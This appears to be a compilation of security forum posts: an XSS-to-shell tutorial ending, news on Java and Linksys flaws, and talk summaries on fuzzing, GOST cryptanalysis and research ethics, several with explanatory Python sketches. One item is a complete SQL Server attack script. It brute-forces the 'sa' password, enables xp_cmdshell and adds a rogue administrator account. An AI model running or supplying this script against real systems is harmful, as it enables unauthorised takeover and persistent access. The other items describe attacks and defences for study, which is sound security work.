SET – Encoders Now we can go back to the web application and insert the malicious JavaScript code into the comment field that we already know is vulnerable to XSS. Malicious JavaScript Code When a user tries to access the page that contains the malicious JavaScript, the code will execute in his browser and a new window will come up containing the following message: Fake message trying to convince the user to run the java applet After a while the user will notice a pop-up box asking whether he wants to run the Java applet. Malicious Java Applet If the user presses the Run button, the malicious code will execute and return us a shell. Remote Shell Conclusion As we saw, stored XSS can be very dangerous, as the JavaScript code executes as soon as an unsuspecting user visits the vulnerable page. In this article the attacker redirected the user to another page in order to run the malicious Java applet that led to a shell. A potential attacker can combine many tools and arbitrary payloads to achieve his goal, so regular penetration tests are a necessity for every company that wants to defend itself against non-ethical hackers. Sursa: Stored XSS And SET
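The whole attack above hinges on the comment field storing attacker input verbatim. As a quick illustration (a simulated comment store, not the application from the tutorial), the sketch below shows how an unescaped field hands the payload to every visitor's browser, while HTML-encoding on output neutralizes it:

```python
import html

# Hypothetical payload an attacker submits through the vulnerable comment form.
payload = "<script>alert('XSS')</script>"

comments = []  # simulated server-side comment store

def store_comment(text, sanitize=False):
    # A vulnerable application stores attacker input verbatim;
    # a safe one HTML-encodes it before it ever reaches a page.
    comments.append(html.escape(text) if sanitize else text)

def render_page():
    # Every visitor's browser receives (and executes) whatever is stored.
    return "<div class='comments'>" + "".join(comments) + "</div>"

store_comment(payload)                 # vulnerable path
vulnerable_page = render_page()
comments.clear()
store_comment(payload, sanitize=True)  # fixed path
safe_page = render_page()

print("<script>" in vulnerable_page)  # True  -> script runs for every visitor
print("<script>" in safe_page)        # False -> payload rendered as inert text
```

Encoding at render time, as html.escape does here, is the standard server-side fix for this class of bug.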
  17. SQL Brute Force Script The purpose of this script is to perform a brute force attack against an SQL Server database. The script tries to connect to the remote host with the administrative account sa and each password from the file pass.txt. If a connection succeeds, it enables xp_cmdshell and adds a new administrative user on the remote host. Author: Larry Spohn Website: http://e-spohn.com Twitter: @Spoonman1091 Credits: Dave Kennedy

#!/usr/bin/python
import _mssql

# mssql = _mssql.connect('ip', 'username', 'password')
# mssql.execute_query()

passwords = file("pass.txt", "r")
ip = "192.168.200.128"

for password in passwords:
    password = password.rstrip()
    try:
        mssql = _mssql.connect(ip, "sa", password)
        print " [*] Successful login with username 'sa' and password: " + password
        print " [*] Enabling 'xp_cmdshell'"
        mssql.execute_query("EXEC sp_configure 'show advanced options', 1;RECONFIGURE;exec SP_CONFIGURE 'xp_cmdshell', 1;RECONFIGURE;")
        mssql.execute_query("RECONFIGURE;")
        print " [*] Adding Administrative user"
        mssql.execute_query("xp_cmdshell 'net user netbiosX Password! /ADD && net localgroup administrators netbiosX /ADD'")
        mssql.close()
        print " [*] Success!"
        break
    except:
        print "[!] Failed login for username 'sa' and password: " + password

Sursa: SQL Brute Force Script
  18. Dll Hijack Auditor is a smart tool to audit any Windows application against the DLL Hijacking vulnerability. This is a critical security issue affecting almost all Windows systems. Though most applications have since been fixed, many Windows applications are still susceptible to this vulnerability, which can allow an attacker to completely take over the system. DllHijackAuditor helps discover all such vulnerable DLLs in a Windows application, which could otherwise lead to successful exploitation and total compromise of the system. With its simple GUI interface, DllHijackAuditor makes it easy for anyone to perform the audit instantly. It also produces a detailed technical audit report that can help the developer fix every vulnerable point in the application. DllHijackAuditor is a standalone portable application and also comes with an installer for local installation and uninstallation. It works on a wide range of platforms, from Windows XP through the latest operating system, Windows 8. Features Here are some of the smart features of DllHijackAuditor: Directly and instantly audit any Windows application. Allows complete testing to uncover all vulnerable points in the target application. Smart debugger-based 'Interception Engine' for consistent and efficient performance without intrusion. Support for specifying and auditing applications with custom and multiple extensions. Timeout configuration to alter the waiting time for each application. Generates a complete audit report (in HTML format) on all vulnerable hijack points in the application. GUI-based tool, making it easy for anyone with minimal knowledge to perform the audit. Does not require any special privileges for auditing (unless the target application requires them). Antivirus-friendly, as it uses no shellcode or exploit code that would trigger antivirus to terminate the operation. Fully portable tool which can be run directly on any system. Supports local installation and uninstallation of the software. Download: http://securityxploded.com/dllhijackauditor.php
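The vulnerability class DllHijackAuditor targets comes from the order in which Windows probes directories when loading a DLL. A minimal sketch simulating that search order in plain Python (the directory list is a simplification of the real Windows order, and this is an illustration, not how the tool itself works):

```python
import os
import tempfile

# Simplified Windows DLL search order: application directory first, then the
# system directory, then the current working directory. A hijack occurs when
# an attacker can write to a directory probed BEFORE the one holding the
# legitimate DLL.
def resolve_dll(dll_name, search_dirs):
    """Return the first directory in which dll_name is found, else None."""
    for d in search_dirs:
        if os.path.exists(os.path.join(d, dll_name)):
            return d
    return None

with tempfile.TemporaryDirectory() as app_dir, \
     tempfile.TemporaryDirectory() as system_dir, \
     tempfile.TemporaryDirectory() as cwd:

    # The legitimate DLL lives in the system directory...
    open(os.path.join(system_dir, "helper.dll"), "w").close()
    search_order = [app_dir, system_dir, cwd]
    legit = resolve_dll("helper.dll", search_order)
    print(legit == system_dir)  # True: resolved from the system directory

    # ...but planting a same-named DLL in the application directory wins,
    # because that directory is searched first.
    open(os.path.join(app_dir, "helper.dll"), "w").close()
    hijacked = resolve_dll("helper.dll", search_order)
    print(hijacked == app_dir)  # True: the planted DLL shadows the real one
```

An auditor like this tool essentially watches the target application perform these probes and flags every directory that gets consulted before the real DLL is found.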
  19. Another Java exploit is on sale for $5,000 Criminals hit Java again just 24 hours after patch By Alastair Stevenson Wed Jan 16 2013, 16:55 ANOTHER EXPLOIT aimed at Oracle's Java software has appeared just days after the company rushed out a patch to fix a previous vulnerability. The exploit was detected on Wednesday by Krebsonsecurity and reportedly takes advantage of another zero day vulnerability in Java. "On Monday, an administrator of an exclusive cybercrime forum posted a message saying he was selling a new Java 0day to a lucky two buyers. The cost: starting at $5,000 each," wrote Brian Krebs. "The hacker forum admin's message promised weaponized and source code versions of the exploit. This seller also said his Java 0day - in the latest version of Java (Java 7 Update 11) - was not yet part of any exploit kits, including the Cool Exploit Kit." If accurate, then the zero day vulnerability will be the second discovered this year. The first vulnerability was discovered after researchers spotted a ransomware Trojan known as Reveton targeting the flaw. Unlike the alleged new attack, the original vulnerability was linked with the popular Blackhole and Cool exploit kits. The kits are infamous toolkits traded on the black market that enable cybercriminals to mount automated attacks. The first attack led to widespread calls within the security industry for internet users to turn Java off. The warnings reached near panic levels when the US Computer Emergency Response Team (CERT) again recommended that internet users shut the software down mere days after Oracle released its security update. Despite the security fears some companies have noted that simply turning Java off might not be an option for large businesses. Krebs was quick to reiterate this sentiment, noting that Java web apps were never designed for use in consumer transactions.
"Much of the advice on how to lock down Java on consumer PCs simply doesn't scale in the enterprise, and vice-versa," wrote Krebbs. "Oracle's unprecedented four-day turnaround on a patch for the last zero-day flaw notwithstanding, the company lacks any kind of outward sign of awareness that its software is so broadly installed on consumer systems. "Oracle seems to be sending a message that it doesn't want hundreds of millions of consumer users; those users should listen and respond accordingly." At the time of publishing Oracle had not responded to a request from The INQUIRER for comment on the reported new Java vulnerability Sursa: Another Java exploit is on sale for $5,000- The Inquirer
  20. DefenseCode Warns of Linksys Router Security Flaw The researchers say they told Cisco about the vulnerability, but were informed it was already fixed. It wasn't. By Jeff Goldman | January 16, 2013 DefenseCode researchers recently uncovered a zero day vulnerability in Linksys routers. "Cisco Linksys is a very popular router with more than 70,000,000 routers sold," the researchers wrote. "That's why we think that this vulnerability deserves attention." "DefenseCode said the flaw is in the default installation of Linksys routers, which are primarily used in home networks," writes CSO Online's Antone Gonsalves. "The company showed a proof-of-concept exploit being used to gain root access to a Linksys model WRT54GL router." "They contacted Cisco and shared a detailed vulnerability description along with the PoC exploit for the vulnerability," writes Help Net Security's Mirko Zorz. "Cisco claimed that the vulnerability was already fixed in the latest firmware release, which turned out [to] be incorrect." "The vulnerability affects all versions of Linksys firmware up to and including the current version, 4.30.14," notes The Register's Richard Chirgwin. "DefenseCode intends to release a full description of the vulnerability within two weeks." "A patch is due out this week, days ahead of DefenseCode's scheduled release of the full vulnerability details," notes SC Magazine's Darren Pauli. Sursa: DefenseCode Warns of Linksys Router Security Flaw - eSecurity Planet
  21. Wireless Beacon Fuzzing Using Metasploit Description: In this video I will show you how to fuzz wireless access points using the Metasploit Framework. For this attack, use BackTrack 5 R2 and install Lorcon2. Once the attack is launched, this module starts fuzzing the AP and other devices, and the AP stops responding to further requests. If you monitor the air you will see many corrupted fake access points, because this module sends out corrupted beacon frames. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Wireless Beacon Fuzzing Using Metasploit
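For a feel of what such a module transmits, here is a rough sketch of building an 802.11 beacon frame as raw bytes. The oversized-SSID corruption at the end is one illustrative malformation, not necessarily the one this Metasploit module uses:

```python
import os
import struct

def beacon_frame(ssid: bytes, bssid: bytes) -> bytes:
    """Build a minimal 802.11 beacon frame as raw bytes."""
    frame_control = b"\x80\x00"           # type: management, subtype: beacon
    duration      = b"\x00\x00"
    dest          = b"\xff" * 6           # broadcast destination
    # 24-byte MAC header: FC, duration, dest, source, BSSID, sequence control
    header = frame_control + duration + dest + bssid + bssid + b"\x00\x00"
    timestamp  = struct.pack("<Q", 0)     # 8-byte TSF timestamp
    interval   = struct.pack("<H", 100)   # beacon interval in time units
    capability = struct.pack("<H", 0x0401)
    # Tagged parameter: SSID (tag number 0). A fuzzer corrupts fields like
    # this one, e.g. by violating the length constraints of the element.
    ssid_tag = struct.pack("BB", 0, len(ssid)) + ssid
    return header + timestamp + interval + capability + ssid_tag

# A well-formed frame versus a corrupted one with an oversized random SSID
# (the spec limits SSIDs to 32 bytes; 255 bytes violates it).
good = beacon_frame(b"TestAP", os.urandom(6))
bad  = beacon_frame(os.urandom(255), os.urandom(6))
print(len(good))  # 44:  header(24) + fixed params(12) + tag header(2) + 6
print(len(bad))   # 293: header(24) + fixed params(12) + tag header(2) + 255
```

Weak AP firmware that parses such malformed tagged parameters without bounds checks is exactly what beacon fuzzing is meant to flush out.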
  22. Security Evaluation Of Russian Gost Cipher Description: In this talk we will survey some 30 recent attacks on the Russian GOST block cipher. Background: The GOST cipher is the official encryption standard of the Russian federation, and also has special versions for the most important Russian banks. Until 2012 there was no attack on GOST when it is used for encryption with random keys. I have developed more than 30 different academic attacks on GOST; the fastest has complexity of 2^118 to recover some but not all 256-bit keys generated at random, which will be presented for the first time at the CCC conference. It happens only once per decade that a government standard is broken while it is still an official government standard (it happened for DES and AES; no other cases are known). All of these are broken only in an academic sense; for GOST the most recent attacks are sliding into arguably practical territory, 30 years from now instead of 200 years... Our earlier results were instrumental at ISO in rejecting GOST as an international encryption standard last year. No more than five block ciphers have ever achieved this level of ISO standardisation in 25 years, and it NEVER happened in the history of ISO that a cipher was broken during the standardization process. Two main papers, with 70 and 30 pages respectively, are Cryptology ePrint Archive: Report 2011/626 and Cryptology ePrint Archive: Report 2012/138. Two other papers have already been published in the Cryptologia journal, which specializes in serious military and government crypto. The talk will cover three main families of attacks on GOST: high-level transformations, low-level inversion/MITM/guess-then-software/algebraic attacks and advanced truncated differential cryptanalysis of GOST. Plan for the talk: First I cover the history of GOST with major Cold War history events as the necessary background.
Then I describe in detail three main families of attacks: 1) self-similarity attacks, which generalize slide, fixed-point and reflection attacks, and provide a large variety of ways in which the security of the full GOST cipher with 32 rounds can be reduced to the security of GOST with 8 rounds in a black box reduction; thus the task of the cryptanalyst is split into two well-defined tasks. 2) detailed software/algebraic and MITM attacks on 8 rounds and how weak diffusion in GOST helps. 3) advanced truncated differential attacks on GOST Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Security Evaluation Of Russian Gost Cipher
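For readers unfamiliar with the cipher under attack, a compact sketch of the GOST 28147-89 structure follows: a 32-round Feistel network whose round function adds a 32-bit subkey mod 2^32, applies eight 4-bit S-boxes, and rotates left by 11. The S-box below is an arbitrary placeholder permutation, not one of the real (historically secret) GOST S-box sets, and the key is a toy value:

```python
import struct

# Placeholder S-box repeated 8 times; real deployments use eight distinct
# 4-bit S-boxes, which this sketch does not reproduce.
SBOX = [[12, 4, 6, 2, 10, 5, 11, 9, 14, 8, 13, 7, 0, 3, 15, 1]] * 8

def _round(n1, n2, k):
    s = (n1 + k) & 0xFFFFFFFF                 # 32-bit modular key addition
    out = 0
    for i in range(8):                        # eight 4-bit S-box lookups
        out |= SBOX[i][(s >> (4 * i)) & 0xF] << (4 * i)
    s = ((out << 11) | (out >> 21)) & 0xFFFFFFFF   # rotate left by 11
    return n2 ^ s

def gost_block(block, subkeys, decrypt=False):
    """Encrypt or decrypt one 64-bit block with eight 32-bit subkeys."""
    # Key schedule: K0..K7 three times, then reversed once (encryption);
    # decryption uses the exact reverse of that order.
    order = subkeys * 3 + subkeys[::-1]
    if decrypt:
        order = subkeys + subkeys[::-1] * 3
    n1, n2 = struct.unpack("<2I", block)
    for i, k in enumerate(order):
        if i < 31:
            n1, n2 = _round(n1, n2, k), n1    # Feistel swap
        else:
            n2 = _round(n1, n2, k)            # no swap on the final round
    return struct.pack("<2I", n1, n2)

key = [i * 0x11111111 for i in range(8)]      # toy 256-bit key
pt = b"\x00\x01\x02\x03\x04\x05\x06\x07"
ct = gost_block(pt, key)
print(gost_block(ct, key, decrypt=True) == pt)  # True: round-trip succeeds
```

The simple, highly repetitive key schedule visible in `order` is exactly what the self-similarity family of attacks in the talk exploits.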
  23. Brute Force Attack On Truecrypt Description: In this video I will show you how to perform a brute-force attack on an encrypted TrueCrypt file or drive. You need one tool, called tc-guessus, and one wordlist. The tool is simple and easy to use: if your password is in the wordlist, the file can be cracked easily. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Brute Force Attack On Truecrypt
  24. Ethics In Security Research Description: Recently, several research papers in the area of computer security were published that may or may not be considered unethical. Looking at these borderline cases is relevant, as today's research papers will influence how young researchers conduct their research. In our talk we address various cases and papers and highlight emerging issues for ethics committees, internal review boards (IRBs) and senior researchers to evaluate research proposals and to finally decide where they see a line that should not be crossed. For researchers in computer security the recent success of papers such as [KKL+09] is an incentive to follow along a line of research where ethical questions become an issue. In our talk at the conference we will address various cases and papers and provide possible guidelines for ethics committees, internal review boards (IRBs) and senior researchers to evaluate research proposals and to finally decide where they see a line that should not be crossed. While some actions might not be illegal, they may still seem unethical. Key phrases that will be addressed in the discussion: (1) Do not harm users actively, (2) Watching bad things happening, (3) Control groups, (4) Undercover work. In the following, we introduce some lines of thought that should be discussed throughout the talk: A first and seemingly straightforward principle is that researchers should not actively harm others. So deploying malware or writing and deploying new viruses is obviously a bad idea. Is it, however, ok to modify malware? Following the arguments of [KKL+08], one would not create more harm if, for instance, one instrumented a virus so that it sent us statistical data about its host. Such a modification could be made by the ISP or the network administrators at a university network. If this modification makes the virus less likely to be detected by anti-virus software, however, the case changes.
Then this is analogous to distributing a new virus. A few quick lab experiments have shown that malware that is detected by virus scanners is very often not picked up after it has been modified. Stealing a user's computing and networking resources may harm her; however, if some other malware already steals those resources, one could argue that the damage is less since the researcher's software does "less bad things". This is basically what the authors of [KKL+08] argue. So when taking over a botnet, generating additional traffic would not be permissible whereas changing traffic would be. The real-world analogue is that you see someone breaking into a house, you scare the person away, and then you go in and only look around, for instance, to understand how the burglar selected the target and what he was planning to steal, which is "less bad" than the theft the burglar was probably planning. There is a line of research where researchers only passively observe malware and phishing without modifying any content or receivers. When thinking of the research ethics of "watching what happens", the Tuskegee Study of Syphilis [W1] comes to mind. Patients were not informed about available treatments, no precautions were taken to prevent patients from infecting others, and they were also actively given false information regarding treatment. Today it is obvious that the study was unethical. As done in [bSBK09], the best way is to ask people for their consent prior to the experiment. In other studies, involving, for instance, botnets, this procedure may be impossible, as a host computer can only be contacted after sending modified messages. In a botnet study such as [sGCC+09] it seems both feasible and responsible to inform a user that her computer is part of a botnet. However obvious this may seem, there might be multiple users on an infected machine, and informing an arbitrary user could cause some additional harm.
For instance, the infection of an office computer may have been caused by deactivating the anti-virus software, surfing to Web pages not related to work, etc. Thus informing one person could cause another person to lose his job. While this is not as extreme as the "Craigslist experiment" [W2], similar impacts are conceivable. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Ethics In Security Research
  25. How I Met Your Pointer Description: An approach to the problem of fuzzing proprietary protocols will be shown, focusing on network protocols and native software. In the course of this talk I will combine several methods in order to force the client software to work as a "double agent" against the server. An interesting approach to the problem of fuzzing proprietary protocols will be presented. Since the method is applicable to several kinds of software, and in order to keep an example in mind throughout the talk, I will be focusing on network protocols and native software. The main idea behind it is very simple: "in a client/server architecture, the client knows how the protocol works." In the course of this talk I will need to combine several methodologies in order to "force" the client software to work as a "double agent" against the server. Advanced hooking, dynamic binary instrumentation and differential debugging are among the topics discussed here. The talk includes a live demo of this method, in which a small program implementing a proprietary protocol will be fuzzed (without knowledge of it) and a memory corruption will be found. Last but not least, the talk is written in a very amusing style, with multiple references to "nerd culture", and interacts with the audience to make the (hard) topic as interesting and entertaining as it can be. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: How I Met Your Pointer
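The simplest concrete form of the "double agent" idea is to capture messages the client legitimately produces and replay them with small corruptions, so the server's parser sees input it never expected. A generic sketch of that mutation step (my own illustration, not the speaker's tooling; the protocol layout is hypothetical):

```python
import random

def mutate(message: bytes, n_flips: int = 4, seed=None) -> bytes:
    """Return a copy of a captured message with a few byte corruptions.

    Distinct positions are chosen and each is XORed with a nonzero value,
    so the result is always the same length but never identical to the
    original message.
    """
    rng = random.Random(seed)
    buf = bytearray(message)
    for pos in rng.sample(range(len(buf)), min(n_flips, len(buf))):
        buf[pos] ^= rng.randrange(1, 256)   # nonzero XOR: byte always changes
    return bytes(buf)

# A captured message from a hypothetical proprietary protocol:
# 4-byte magic, 2-byte big-endian length, then the payload.
captured = b"PRTO" + (11).to_bytes(2, "big") + b"hello world"

fuzzed = mutate(captured, seed=1)
print(len(fuzzed) == len(captured))   # True: length preserved
print(fuzzed != captured)             # True: at least one byte corrupted
```

Hooking the real client at its send routine and applying a mutation like this is what turns it into a protocol-aware fuzzer without ever reverse engineering the message format.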